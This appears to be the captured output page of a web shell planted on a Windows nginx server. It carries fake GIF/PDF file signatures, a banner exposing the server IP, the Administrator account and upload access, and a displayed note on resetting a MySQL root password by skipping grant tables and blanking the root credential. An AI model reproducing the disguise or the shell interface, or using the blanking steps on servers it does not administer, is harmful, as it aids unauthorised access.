GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST1602/Resources/command-line/ |
Upload File : |
https://gist.github.com/pishangujeniya/0f839d11a7e692dadc49821c274a2394 Reset MySQL 8.0 root Password in Windows Stop the MySQL 8.0service from services Go to path C:\Program Files\MySQL\MySQL Server 8.0\bin and open cmd Run mysqld --defaults-file="C:\ProgramData\MySQL\MySQL Server 8.0\\my.ini" --console --skip-grant-tables --shared-memory Open new cmd in the same path Run following commands mysql -u root select authentication_string,host from mysql.user where user='root'; UPDATE mysql.user SET authentication_string='' WHERE user='root'; Now close both the cmd. Try to start the MySQL 8.0 service. Connect using username as root & password as blank. Change the password from the user managerment.